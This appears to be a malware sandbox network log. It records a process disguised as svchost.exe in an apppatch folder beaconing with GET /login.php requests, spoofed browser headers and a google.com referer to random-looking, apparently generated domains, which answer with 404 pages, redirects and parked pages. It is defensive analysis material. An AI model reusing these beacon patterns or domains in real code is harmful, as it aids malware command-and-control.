                                                                                                                                                                                                          Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_VMytHbmmrfMc+kzmiPYTt2uS2PDnHHj/p/2nCNN04G2eOrYX/LSI9ifattC96o92xCzWruQ65ql9+oondzcTDQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.368007898 CET520INData Raw: 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65
                                                                                                                                                                                                          Data Ascii: " href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMjQ0Y2ExN2UtOGNmOS00ZGZlLWFmNjQtMzZiNzFhMDQxNjc5IiwicGFnZV90aW1lIjoxNzMxMzQ1ODY3LCJwYWdlX3VybCI6Imh0dHA6L
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.368019104 CET520INData Raw: 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65
                                                                                                                                                                                                          Data Ascii: " href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMjQ0Y2ExN2UtOGNmOS00ZGZlLWFmNjQtMzZiNzFhMDQxNjc5IiwicGFnZV90aW1lIjoxNzMxMzQ1ODY3LCJwYWdlX3VybCI6Imh0dHA6L


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          34192.168.2.86320623.253.46.64801736C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.897006035 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: gahyqah.com
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.368032932 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Server: Microsoft-IIS/7.5
                                                                                                                                                                                                          X-Powered-By: ASP.NET
                                                                                                                                                                                                          Date: Mon, 11 Nov 2024 17:24:21 GMT
                                                                                                                                                                                                          Content-Length: 1245
                                                                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e [TRUNCATED]
                                                                                                                                                                                                          Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-contai [TRUNCATED]
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.368045092 CET169INData Raw: 20 20 3c 68 33 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67
                                                                                                                                                                                                          Data Ascii: <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          35192.168.2.86320785.17.31.82801736C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          Nov 11, 2024 18:24:26.897295952 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: gatyfus.com


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          36192.168.2.86320875.2.71.199801736C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.036457062 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: puzylyp.com
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.462372065 CET166INHTTP/1.1 308 Permanent Redirect
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          Location: https://puzylyp.com/login.php
                                                                                                                                                                                                          Server: Caddy
                                                                                                                                                                                                          Date: Mon, 11 Nov 2024 17:24:27 GMT
                                                                                                                                                                                                          Content-Length: 0


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          37192.168.2.86320985.17.31.82801736C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.386780977 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: gatyfus.com


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          38192.168.2.86321023.253.46.64801736C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.421636105 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: gahyqah.com
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.878686905 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Server: Microsoft-IIS/7.5
                                                                                                                                                                                                          X-Powered-By: ASP.NET
                                                                                                                                                                                                          Date: Mon, 11 Nov 2024 17:24:22 GMT
                                                                                                                                                                                                          Content-Length: 1245
                                                                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e [TRUNCATED]
                                                                                                                                                                                                          Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-contai [TRUNCATED]
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.878726959 CET169INData Raw: 20 20 3c 68 33 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67
                                                                                                                                                                                                          Data Ascii: <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          39192.168.2.861825103.224.182.252801736C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          Nov 11, 2024 18:24:37.022259951 CET277OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: vofycot.com
                                                                                                                                                                                                          Cookie: __tad=1731345856.5179536
                                                                                                                                                                                                          Nov 11, 2024 18:24:37.589415073 CET242INHTTP/1.1 302 Found
                                                                                                                                                                                                          date: Mon, 11 Nov 2024 17:24:37 GMT
                                                                                                                                                                                                          server: Apache
                                                                                                                                                                                                          location: http://ww16.vofycot.com/login.php?sub1=20241112-0424-3743-a98f-0148015a85a2
                                                                                                                                                                                                          content-length: 2
                                                                                                                                                                                                          content-type: text/html; charset=UTF-8
                                                                                                                                                                                                          connection: close
                                                                                                                                                                                                          Data Raw: 0a 0a
                                                                                                                                                                                                          Data Ascii:


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          40192.168.2.861826103.224.212.210801736C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          Nov 11, 2024 18:24:37.076800108 CET277OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: lyxynyx.com
                                                                                                                                                                                                          Cookie: __tad=1731345856.5241611
                                                                                                                                                                                                          Nov 11, 2024 18:24:37.627923965 CET244INHTTP/1.1 302 Found
                                                                                                                                                                                                          date: Mon, 11 Nov 2024 17:24:37 GMT
                                                                                                                                                                                                          server: Apache
                                                                                                                                                                                                          location: http://ww25.lyxynyx.com/login.php?subid1=20241112-0424-3729-8680-cf4058033ce0
                                                                                                                                                                                                          content-length: 2
                                                                                                                                                                                                          content-type: text/html; charset=UTF-8
                                                                                                                                                                                                          connection: close
                                                                                                                                                                                                          Data Raw: 0a 0a
                                                                                                                                                                                                          Data Ascii:


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          41192.168.2.86182764.190.63.136801736C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          Nov 11, 2024 18:24:37.599100113 CET348OUTGET /login.php?sub1=20241112-0424-3743-a98f-0148015a85a2 HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: ww16.vofycot.com
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          Cookie: __tad=1731345856.5179536
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.265906096 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                          date: Mon, 11 Nov 2024 17:24:38 GMT
                                                                                                                                                                                                          content-type: text/html; charset=UTF-8
                                                                                                                                                                                                          transfer-encoding: chunked
                                                                                                                                                                                                          vary: Accept-Encoding
                                                                                                                                                                                                          expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                          cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                          pragma: no-cache
                                                                                                                                                                                                          x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_ZpUyBsvWeb9ETF6HHS7dQ30lDdRFS5bcXTW45aRwuOYixiQ2ZB7H37Moh8ypy7GCq6CNEpeGjL44L2kAJVsBtg==
                                                                                                                                                                                                          last-modified: Mon, 11 Nov 2024 17:24:38 GMT
                                                                                                                                                                                                          x-cache-miss-from: parking-7596689c44-jngxs
                                                                                                                                                                                                          server: Parking/1.0
                                                                                                                                                                                                          Data Raw: 32 45 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 6e 79 6c 57 77 32 76 4c 59 34 68 55 6e 39 77 30 36 7a 51 4b 62 68 4b 42 66 76 6a 46 55 43 73 64 46 6c 62 36 54 64 51 68 78 62 39 52 58 57 58 75 49 34 74 33 31 63 2b 6f 38 66 59 4f 76 2f 73 38 71 31 4c 47 50 67 61 33 44 45 31 4c 2f 74 48 55 34 4c 45 4e 4d 43 41 77 45 41 41 51 3d 3d 5f 5a 70 55 79 42 73 76 57 65 62 39 45 54 46 36 48 48 53 37 64 51 33 30 6c 44 64 52 46 53 35 62 63 58 54 57 34 35 61 52 77 75 4f 59 69 78 69 51 32 5a 42 37 48 33 37 4d 6f 68 38 79 70 79 37 47 43 71 36 43 4e 45 70 65 47 6a 4c 34 34 4c 32 6b 41 4a 56 73 42 74 67 3d 3d 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 76 6f 66 79 63 6f 74 2e 63 6f 6d 26 6e 62 73 70 3b 2d 26 6e 62 73 70 3b 54 68 69 73 20 77 65 62 [TRUNCATED]
                                                                                                                                                                                                          Data Ascii: 2E3<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_ZpUyBsvWeb9ETF6HHS7dQ30lDdRFS5bcXTW45aRwuOYixiQ2ZB7H37Moh8ypy7GCq6CNEpeGjL44L2kAJVsBtg==><head><meta charset="utf-8"><title>vofycot.com&nbsp;-&nbsp;This website is for sale!&nbsp;-&nbsp;vofycot Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="This website is for sale! vofycot.com is your first and bes
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.265944958 CET1236INData Raw: 74 20 73 6f 75 72 63 65 20 66 6f 72 20 61 6c 6c 20 6f 66 20 74 68 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 79 6f 75 e2 80 99 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 20 46 72 6f 6d 20 67 65 6e 65 72 61 6c 20 74 6f 70 69 63 73 20 74 6f 20 6d
                                                                                                                                                                                                          Data Ascii: t source for all of the information youre looking for. From general topics to more of what you would expect to find here, vofycot.com h59Bas it all. We hope you find what you are searching for!"><link rel="icon" type="im
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.265960932 CET1236INData Raw: 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 7d 61 75 64 69 6f 3a 6e 6f 74 28 5b 63 6f 6e 74 72 6f 6c 73 5d 29 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 68 65 69 67 68 74 3a 30 7d 69 6d 67 7b 62 6f 72 64 65 72 2d 73 74 79 6c 65 3a 6e 6f 6e 65
                                                                                                                                                                                                          Data Ascii: lay:inline-block}audio:not([controls]){display:none;height:0}img{border-style:none}svg:not(:root){overflow:hidden}button,input,optgroup,select,textarea{font-family:sans-serif;font-size:100%;line-height:1.15;margin:0}button,input{overflow:visib
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.265989065 CET1236INData Raw: 72 61 6e 63 65 3a 62 75 74 74 6f 6e 3b 66 6f 6e 74 3a 69 6e 68 65 72 69 74 7d 64 65 74 61 69 6c 73 2c 6d 65 6e 75 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 73 75 6d 6d 61 72 79 7b 64 69 73 70 6c 61 79 3a 6c 69 73 74 2d 69 74 65 6d 7d 63 61 6e
                                                                                                                                                                                                          Data Ascii: rance:button;font:inherit}details,menu{display:block}summary{display:list-item}canvas{display:inline-block}template{display:none}[hidden]{display:none}.announcement{background:#0e162e;text-align:center;padding:0 5px}.announcement p{color:#8484
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.266005039 CET1236INData Raw: 72 20 61 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 64 69 73 63 6c 61 69 6d 65 72 5f 5f 63 6f 6e 74 65 6e 74 2d 74 65 78 74 7b 63 6f 6c 6f 72 3a 23 39 34 39 34 39 34 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 64 69
                                                                                                                                                                                                          Data Ascii: r a{font-size:10px}.container-disclaimer__content-text{color:#949494}.container-disclaimer a{color:#949494}.container-imprint{text-align:center}.container-imprint__content{display:inline-block}.container-imprint__content-text,.container-imprin
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.266020060 CET1236INData Raw: 72 67 69 6e 2d 74 6f 70 3a 31 30 70 78 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 70 78 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 35 70 78 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 6c 61 72 67 65 72 7d
                                                                                                                                                                                                          Data Ascii: rgin-top:10px;margin-right:0px;margin-bottom:5px;margin-left:0px;font-size:larger}.container-cookie-message a{color:#fff}.cookie-modal-window{position:fixed;background-color:rgba(200,200,200,.75);top:0;right:0;bottom:0;left:0;-webkit-transitio
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.266036034 CET1236INData Raw: 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 32 31 38 38 33 38 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 32 31 38 38 33 38 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 69 6e 69 74 69 61 6c 7d 2e 62 74 6e 2d 2d 73
                                                                                                                                                                                                          Data Ascii: background-color:#218838;border-color:#218838;color:#fff;font-size:initial}.btn--success-sm:hover{background-color:#1a6b2c;border-color:#1a6b2c;color:#fff;font-size:initial}.btn--secondary{background-color:#8c959c;border-color:#8c959c;color:#f
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.266053915 CET1236INData Raw: 2d 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 58 28 32 36 70 78 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 58 28 32 36 70 78 29 7d 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 65 31 36
                                                                                                                                                                                                          Data Ascii: -transform:translateX(26px);transform:translateX(26px)}body{background-color:#0e162e;font-family:Arial,Helvetica,Verdana,"Lucida Grande",sans-serif}body.cookie-message-enabled{padding-bottom:300px}.container-footer{padding-top:20px;padding-lef
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.266069889 CET1236INData Raw: 6e 3b 2d 6d 6f 7a 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 58 28 2d 31 29 3b 2d 6f 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 58 28 2d 31 29 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 58 28 2d 31 29 3b 74
                                                                                                                                                                                                          Data Ascii: n;-moz-transform:scaleX(-1);-o-transform:scaleX(-1);-webkit-transform:scaleX(-1);transform:scaleX(-1);z-index:-1}.container-content--lp{min-height:720px}.container-content--rp{width:100%;min-height:820px;margin:0}.container-content--twot{min-h
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.266086102 CET92INData Raw: 6f 6e 65 7d 2e 77 65 62 61 72 63 68 69 76 65 2d 62 6c 6f 63 6b 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 77 65 62 61 72 63 68 69 76 65 2d 62 6c 6f 63 6b 5f 5f 68 65 61 64 65 72 2d 6c 69 6e 6b 7b 63 6f 6c 6f 72 3a 23 39 66 64 38
                                                                                                                                                                                                          Data Ascii: one}.webarchive-block{text-align:center}.webarchive-block__header-link{color:#9fd801;font-
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.271121979 CET1236INData Raw: 35 37 36 0d 0a 73 69 7a 65 3a 32 30 70 78 7d 2e 77 65 62 61 72 63 68 69 76 65 2d 62 6c 6f 63 6b 5f 5f 6c 69 73 74 7b 70 61 64 64 69 6e 67 3a 30 7d 2e 77 65 62 61 72 63 68 69 76 65 2d 62 6c 6f 63 6b 5f 5f 6c 69 73 74 2d 65 6c 65 6d 65 6e 74 7b 77
                                                                                                                                                                                                          Data Ascii: 576size:20px}.webarchive-block__list{padding:0}.webarchive-block__list-element{word-wrap:break-word;list-style:none}.webarchive-block__list-element-link{line-height:30px;font-size:20px;color:#9fd801}.webarchive-block__list-element-link:link,


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                          42192.168.2.861828199.59.243.22780
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          Nov 11, 2024 18:24:37.645051003 CET404OUTGET /login.php?subid1=20241112-0424-3729-8680-cf4058033ce0 HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: ww25.lyxynyx.com
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          Cookie: __tad=1731345856.5241611; parking_session=a5572c25-6032-467b-b015-10575c4e4ea5
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.072262049 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                          date: Mon, 11 Nov 2024 17:24:37 GMT
                                                                                                                                                                                                          content-type: text/html; charset=utf-8
                                                                                                                                                                                                          content-length: 1230
                                                                                                                                                                                                          x-request-id: 32629e49-5042-4249-af91-fe63c7c02664
                                                                                                                                                                                                          cache-control: no-store, max-age=0
                                                                                                                                                                                                          accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                          critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                          vary: sec-ch-prefers-color-scheme
                                                                                                                                                                                                          x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_WZ/4eNcc8on8jlCpj1eGWWuK9XsutLntpAdjHD3FZ7soukl0OKukVBSnjQ9ekL6NU/H4FRChnILsiqMVZlSVXg==
                                                                                                                                                                                                          set-cookie: parking_session=a5572c25-6032-467b-b015-10575c4e4ea5; expires=Mon, 11 Nov 2024 17:39:38 GMT
